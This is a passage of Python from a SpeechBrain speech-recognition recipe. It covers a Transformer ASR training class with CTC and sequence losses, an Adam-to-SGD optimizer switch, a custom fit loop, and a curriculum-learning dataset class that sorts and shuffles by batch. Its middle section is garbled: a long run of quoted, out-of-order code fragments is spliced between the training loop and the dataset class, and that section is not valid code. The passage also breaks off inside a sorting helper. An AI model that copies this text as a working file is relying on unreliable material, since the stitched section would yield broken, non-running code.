        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )
        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)
        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)
        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch
                # with limited capacity and no LM to give user some idea of
                # how the AM is doing
                hyps, _ = self.hparams.valid_search(
                    enc_out.detach(), wav_lens
                )
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)
        return p_ctc, p_seq, wav_lens, hyps

    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss (CTC+NLL) given predictions and targets."""
        (p_ctc, p_seq, wav_lens, hyps,) = predictions
        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens
        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)
        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )
        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if current_epoch % valid_search_interval == 0 or (
                stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)
            # compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq
    def fit_batch(self, batch):
        """Train the parameters given a single batch in input"""
        # check if we need to switch optimizer;
        # if so change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()
        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )
        # normalize the loss by gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()
        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)
            self.optimizer.step()
            self.optimizer.zero_grad()
            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)
        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches"""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(
                predictions, batch, stage=stage
            )
        return loss.detach()

    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(
                epoch=self.hparams.epoch_counter.current
            )
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")
        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # report different epoch stages according current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__
            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={
                    "Epoch loaded": self.hparams.epoch_counter.current
                },
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)
            # save the averaged checkpoint at the end of the evaluation
            # stage; delete the rest of the intermediate checkpoints.
            # ACC is set to 1.1 so checkpointer only keeps the averaged
            # checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )
    def recreate_train_dataset(self, epoch):
        """Gets called at the end of an epoch. This is used to handle
        whether the dataset needs to be reshuffled at the end of the epoch.
        (All branches are placeholders in this snapshot of the recipe.)"""
        if self.inter_epoch_dataset_updation:
            if self.sortagrad != -1:
                # number of epochs for which curriculum must be used is
                # defined
                if self.sortagrad < epoch:
                    # recreate dataset using random shuffling
                    return
                else:
                    # recreate dataset using preferred cl approach
                    return
        else:
            if self.sortagrad != -1:
                # number of epochs for which curriculum must be used is
                # defined
                return

    def check_and_reset_optimizer(self):
        """reset the optimizer if training enters stage 2"""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True
        if self.switched is True:
            return
        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())
            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)
            self.switched = True

    def on_fit_start(self):
        """Initialize the right optimizer on the training start"""
        super().on_fit_start()
        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())
            # Load latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # do not reload the weights if training is interrupted right
                # before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return
                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )
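    # Sketch of the two-stage schedule implemented above (the epoch counts
    # are made up): with stage_one_epochs = 90, epochs 1-90 train with Adam
    # under Noam annealing; from epoch 91 on, check_and_reset_optimizer()
    # swaps in self.hparams.SGD and registers it with the checkpointer so
    # that resuming keeps the SGD state.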
    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve objective.

        Relies on the existence of multiple functions that can (or should)
        be overridden. The following methods are used and expected to have a
        certain behavior:

        * ``fit_batch()``
        * ``evaluate_batch()``
        * ``update_average()``

        If the initialization was done with distributed_count > 0 and the
        distributed_backend is ddp, this will generally handle multiprocess
        logic, like splitting the training data into subsets for each device
        and only saving a checkpoint on the main process.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            A set of data to use for training. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        valid_set : Dataset, DataLoader
            A set of data to use for validation. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the train_loader
            (if train_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the valid_loader
            (if valid_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader)
            or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader)
            or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )
        self.on_fit_start()
        self.train_set = train_set
        total_steps = len(train_set)
        if progressbar is None:
            progressbar = not self.noprogressbar
        # Iterate epochs
        for epoch in epoch_counter:
            # Training stage
            self.on_stage_start(Stage.TRAIN, epoch)
            self.modules.train()
            # Reset nonfinite count to 0 each epoch
            self.nonfinite_count = 0
            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)
            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()
            # Only show progressbar if requested and main_process
            enable = progressbar and sb.utils.distributed.if_main_process()
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)
                    # Write training summary to tensorboard (the scalar tag
                    # names here are an assumption; the original ones were
                    # lost in the source)
                    global_step = completed_steps + self.step
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/tot_loss", loss, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/ctc_loss", loss_ctc, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/seq_loss", loss_seq, global_step
                    )
                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break
                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()
            # Run train "on_stage_end" on all processes
            self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0
            # Validation stage
            if valid_set is not None:
                self.on_stage_start(Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )
                        # Debug mode only runs a few batches
                        if self.debug and self.step == self.debug_batches:
                            break
                    # Write validation summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Validation/Loss/tot_loss", avg_valid_loss, epoch
                    )
                    self.tensorboard_writer.add_scalar(
                        "Validation/Accuracy/tot_acc",
                        self.acc_metric.summarize(),
                        epoch,
                    )
                    # Only run validation "on_stage_end" on main process
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
                        args=[Stage.VALID, avg_valid_loss, epoch],
                    )
            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break
inter_epoch_dataset_updation : bool Whether dataset must be updated every between epochs", "print(batch.duration) # # print(batch.wrd) # # if cnt == 5: # # exit()", "sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder},", "so change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN)", "stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class", "None, dict Map from data_id to weight, these weight(s) will be used to", "how to order batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` -", "# if the model is resumed from stage two, reinitialize the optimizer current_epoch", "for index,id in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self, weights=None,", "partial function definition). By default, this will be passed all modules in ``modules``", "= torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats =", "sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w)", "!= sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch):", "stage # delete the rest of the intermediate checkpoints # ACC is set", "YAML file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) #", "like splitting the training data into subsets for each device and only saving", "**hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, # initial=0, # dynamic_ncols=True, #", "torch.optim.SGD): self.switched = True if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs:", "compiled. distributed_count (int) Number of devices to run on. distributed_backend (str) One of", "(e.g, train-clean 100 rather than the full one), and many other possible variations.", "for key, func in key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys", "> 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time", "many other possible variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME>", "the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create", "else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data", "epochs and datasets to improve objective. Relies on the existence of multiple functions", "only runs a few batches if self.debug and self.step == self.debug_batches: break #", "[i for k, i in test_datasets.items()] # We get the tokenizer as we", "for data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count", "in key_min_value.items(): if computed[key] >= limit: continue return False for key, limit in", "called on them. 
opt_class : torch.optim class A torch optimizer constructor that has", "hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer )", "avg_valid_loss, epoch], ) # Debug mode only runs a few epochs if self.debug", "def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints(", "is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _", "\"OOPS!! Batchwise sorting gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id]", "> 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire", "else: raise NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\" )", "each epoch self.nonfinite_count = 0 if self.train_sampler is not None and hasattr( self.train_sampler,", "pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc", "run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The", "``-1`` - Use curriculum learning for all epochs * ``n`` - Use curriculum", "res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order", "checkpoint last_ckpt_time = time.time() # Only show progressbar if requested and main_process enable", "# Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create", "): \"\"\"Compare two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2", "distributed_count > 0 and the distributed_backend is ddp, this will generally handle multiprocess", "enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with", "in debug mode, Default ``2``. If a non-positive number is passed, all epochs", "on pre-defined keys( and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" -", "bool Whether to display the progress of each epoch in a progressbar. \"\"\"", "= self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id] = index return", "(float) Amount of time between saving intra-epoch checkpoints, in minutes, default: ``15.0``. 
If", "== True min_weight : None, int If not None, will only keep data_point", "intermediate checkpoints # ACC is set to 1.1 so checkpointer only keeps the", "= sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate", "\"\"\"Returns a list of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value,", "Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage", "# disable=False, # ) as t: # cnt = 0 # for batch", "device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to", "if self.checkpointer is not None: # do not reload the weights if training", "Map from key (in data or in dynamic items) to limit, will only", "# # we sort training data to speed up training and get better", "must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\":", "= self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer =", "for key, limit in key_max_value.items(): if computed[key] <= limit: continue return False for", "dataset into batches of size `batch_size` and order these batches randomly to create", "): # TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs )", "the data example fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items(): if", "True min_weight : None, int If not None, will only keep data_point if", "Activate it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_``", "two methods is done. For more complicated use cases, such as multiple modules", "= batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if specified if stage", "] target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) #", "dataset using preferred cl approach return else: # recreate dataset using preferred cl", "last 5 epochs. 
The experiment file is flexible enough to support a large", "{} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self,", "= self.update_average( loss, avg_valid_loss ) # Debug mode only runs a few batches", "as equal, continue # comparing using the next key, else return the result", "== 0: # for the sake of efficiency, we only perform beamsearch with", "keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example: *", "key2 ): \"\"\"Compare two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"])", "will only keep data_point if weight[data_point] < max_weight weights : None, dict Map", ") filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point =", "import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import", "model is resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer", "if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts,", "else: # raise NotImplementedError( # \"sorting must be random, ascending or descending\" #", "hparams/conformer.yaml With the default hyperparameters, the system employs a convolutional frontend and a", "overridden methods. These will be accessible via an ``hparams`` attribute, using \"dot\" notation:", "weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value ==", "+= data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights", "equal, continue # comparing using the next key, else return the result if", "creates a dictionary out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for", "can be changed by overriding the ``configure_optimizers()`` method. hparams : dict Each key:value", "batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add", "sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info`", "1. # Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa #", "else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if", "len(shuffled_data_ids) == len(data_ids) , \"OOPS!! 
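# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original recipe): the
# CurriculumOrientedDynamicDataset below chains per-key comparators through
# functools.cmp_to_key to build a multi-key ordering. The helper below is a
# self-contained, hypothetical demonstration of that technique; the recipe
# never calls it.
def _demo_multikey_sort():
    """Sort hypothetical (duration, n_words) records by duration ascending,
    breaking ties with n_words descending."""
    records = {"a": (3.2, 5), "b": (1.1, 9), "c": (1.1, 2)}

    def compare(id1, id2):
        for idx, sign in ((0, 1), (1, -1)):  # (field index, asc=1 / desc=-1)
            res = (records[id1][idx] > records[id2][idx]) - (
                records[id1][idx] < records[id2][idx]
            )
            res *= sign
            if res != 0:
                return res
        return 0

    assert sorted(records, key=cmp_to_key(compare)) == ["b", "c", "a"]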
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
    """DynamicItemDataset with curriculum-aware filtering and sorting."""

    def curriculum_based_filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of the dataset based on the
        specified curriculum; shares static data.

        The reason to implement these operations in the same method is that
        computing some dynamic items may be expensive, and this way the
        filtering and sorting steps don't need to compute the dynamic items
        twice.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit; only keeps
            data_point if data_point[key] >= limit.
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit; only keeps
            data_point if data_point[key] <= limit.
        key_test : dict
            Map from key (in data or in dynamic items) to func; only keeps
            data_point if bool(func(data_point[key])) == True.
        min_weight : None, int
            If not None, only keeps data_point if weight[data_point] > min_weight.
        max_weight : None, int
            If not None, only keeps data_point if weight[data_point] < max_weight.
        weights : None, dict
            Map from data_id to weight; these weights will be used to sort
            the dataset.
        ordering_info : str
            Information to create weights based on pre-defined keys (and/or
            methods) and their order.
            - Format: "<key1>:<order1>,<key2>:<order2>,..."
            - Options for keys: `input_length`, `output_length`, `alphabetic`
            - Options for order: `asc`, `desc`
            - Example: "input_length:asc,output_length:desc" sorts the dataset
              using ``input_length`` in ascending order, breaking ties with
              ``output_length`` in descending order.
            Note: this is used only if `weights` is None.
        batch_selection : str
            How to order batches. Possible values are `contiguous`, `random`,
            `sorted`, `reverse-sorted`. For example, "random" means: after the
            dataset is ordered based on `ordering_info`, divide the dataset
            into batches of size `batch_size` and order these batches randomly
            to create the final dataset.
        batch_size : int
            Used to divide the dataset into batches (default 8). This helps
            in ordering the dataset at batch level.
        select_n : None, int
            If not None, only keep (at most) the first n filtered data points.
            The possible sorting is applied, but only on the first n data
            points found. Meant for debugging.

        Returns
        -------
        FilteredSortedDynamicItemDataset
            Shares the static data, but has its own output keys and dynamic
            items (initially deep copied from this, so they have the same
            dynamic items available).
        """
        # Keys for ordering info can be: input_length, output_length, alphabetic
        dataset_ordering = self._parse_dataset_order(ordering_info)
        ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"
        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )
        # Order the entire dataset
        if ordering_type == "random":
            weights = self._random_shuffled_weights(filtered_data_ids)
        elif ordering_type == "sorted":
            if weights is None:
                # Create weights using the ordering info
                weights = self._custom_sorted_weights(
                    filtered_data_ids, dataset_ordering
                )
        else:
            raise NotImplementedError(
                "Ordering type must be one of random, sorted, weighted_sorted."
            )
        # Order batchwise
        if batch_selection == "contiguous":
            pass
        elif batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "Batch selection must be one of contiguous, random, sorted, "
                "reverse-sorted."
            )
        # Create the final id list using the weights
        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(self, filtered_sorted_ids)

    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns a list of data ids fulfilling the filtering criteria."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria."""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids

    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None, reverse=False
    ):
        """Returns a list of data ids, filtered and sorted using custom weights."""

        def weights_filter(weights, min_value, max_value):
            """Checks that each data example has a weight within the range
            (`min_value`, `max_value`)."""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # Iterate over a copy: popping from a dict while iterating its
            # items raises a RuntimeError.
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(filtered_weights.keys()):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((filtered_weights[data_id], i, data_id))
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ]
        return filtered_sorted_ids

    def _parse_dataset_order(self, dataset_order=""):
        """Takes `ordering_info` as a string and turns it into a list of
        {"key": ..., "order": ...} dicts."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info

    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids in random order."""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weights for data_ids."""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        return {data_id: index for index, data_id in enumerate(shuffled_ids)}

    def _order_ids_by_weight(self, weights):
        """Lay the ids out according to their current weights. (The original
        reordered the id list in place while iterating it, which overwrote
        entries; building a fresh list avoids that.)"""
        ordered = [None] * len(weights)
        for data_id, weight in weights.items():
            ordered[weight] = data_id
        return ordered

    def _random_shuffled_batches(self, weights=None, batch_size=8, reverse=False):
        """Randomly shuffle the dataset at batch level."""
        data_ids = self._order_ids_by_weight(weights)
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise shuffling gone wrong."
        return {
            data_id: index for index, data_id in enumerate(shuffled_data_ids)
        }

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse sort the dataset at batch level."""
        data_ids = self._order_ids_by_weight(weights)
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise sorting gone wrong."
        return {
            data_id: index for index, data_id in enumerate(shuffled_data_ids)
        }

    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create `weights` for data points using `ordering_info`."""

        def compare(key1, key2):
            """Comparing logic; `ordering_info` can contain multiple keys.
            Return value: 1 means key1 > key2, -1 means key1 < key2, 0 equal."""
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res *= order
                # If the comparison says the two are equal, continue comparing
                # using the next key; else return the result.
                if res == 0:
                    continue
                else:
                    return res
            return res

